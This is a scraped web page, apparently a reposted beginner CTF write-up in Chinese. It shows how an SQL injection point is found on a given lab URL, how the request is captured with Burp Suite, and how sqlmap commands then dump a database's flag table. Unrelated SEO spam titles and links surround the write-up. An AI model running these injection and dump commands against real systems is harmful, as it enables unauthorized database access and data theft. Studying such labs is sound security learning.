当前位置: 首页 > news >正文

扫描购物网站建设北京高端网站建设

扫描购物网站建设,北京高端网站建设,学校网站建设企业,欧洲服务器免费ip地址使用sqlmap burpsuite sql工具注入拿flag 记录一下自己重新开始学习web安全之路③。 目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/ 首先判断网站是否存在SQL注入漏洞 1.找交互点 发现只有url这一个交互点,搜索框和登录…

使用sqlmap + burpsuite sql工具注入拿flag

记录一下自己重新开始学习web安全之路③。
目标网站:http://mashang.eicp.vip:1651/7WOY59OBj74nTwKzs3aftsh1MDELK2cG/

首先判断网站是否存在SQL注入漏洞

1.找交互点

发现只有url这一个交互点,搜索框和登录框都没有。

2.找注入点

1

在唯一的交互点url中输入?id=2‘

2

发现回显不正常,说明该url是一个注入点

打开burpsuite 的抓包功能,在url中输入?id=2’,开始抓包。

3

使用sqlmap工具。

1.查看数据库名称(message)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” --current-db

–current-db //列出当前所有数据库名称

db // datebase

4

2.查看数据表名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message --tables

-D //指定数据库名称

–tables // 列出所有的数据表

5

3.查看数据列名称(flag)

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag --columns

-D //指定数据库名称

-T // 指定数据表名称

–columns // 列出所有的列

6

4.查看数据

python sqlmap.py -r “C:\Users\86131\Desktop\555.txt” -D message -T flag -C flag --dump

-D //指定数据库名称

-T // 指定数据表名称

-C // 指定数据列名称

–dump // 读取数据

7

MD5解密

8

遇到的问题

抓到的包必须是注入点的包,不然用sqlmap的时候,会报错。

9

http://www.ds6.com.cn/news/12495.html

相关文章:

  • 安阳做网站的费用seo网站关键词优化怎么做
  • 廊坊哪里有做网站的如何自己制作网站
  • win2008 建立网站关键词查询工具
  • 网站做轮播图的意义图片识别搜索引擎
  • dw旅游网站模板下载百度官网首页下载
  • 大庆今天最新公告北京seo优化多少钱
  • 做数学题挣钱的网站seo软件优化工具软件
  • 做投融资平台的网站都有哪些?手机广告推广软件
  • 做淘宝优惠券网站要多少钱互联网营销师考证多少钱
  • 做外贸家纺资料网站windows优化大师卸载
  • 关于网站建设外文文献百度搜索推广方法
  • 邢台网站建设最新报价seo整站优化方案
  • web2py做的网站免费软文发布平台有哪些
  • 在香港做网站需要什么企业qq和个人qq有什么区别
  • 网站规划的流程个人博客模板
  • 网站源码下载软件营销网站建设哪家好
  • Wordpress网站调用代码做网站设计的公司
  • 英文b2c网站建设南京seo排名
  • 做设计有哪些接私活的网站神马seo服务
  • 服务器安全设置宁波超值关键词优化
  • 公司建立网站的意义打开百度一下你就知道
  • 寿阳网站建设成人教育培训机构排名
  • 网站建设如何网络销售乔拓云智能建站官网
  • 沂源网站建设yx718谷歌paypal官网注册入口
  • 开发一个商城网站多少钱网络营销出来可以干什么工作
  • 大型的网站开发seo第三方点击软件
  • 做网站的设计尺寸域名注册免费
  • 电商 网站 备案今天刚刚的最新新闻
  • 怎么用自己的电脑做网站爱营销电信版下载app最新版
  • 义乌哪里有学做网站的做百度推广的公司电话号码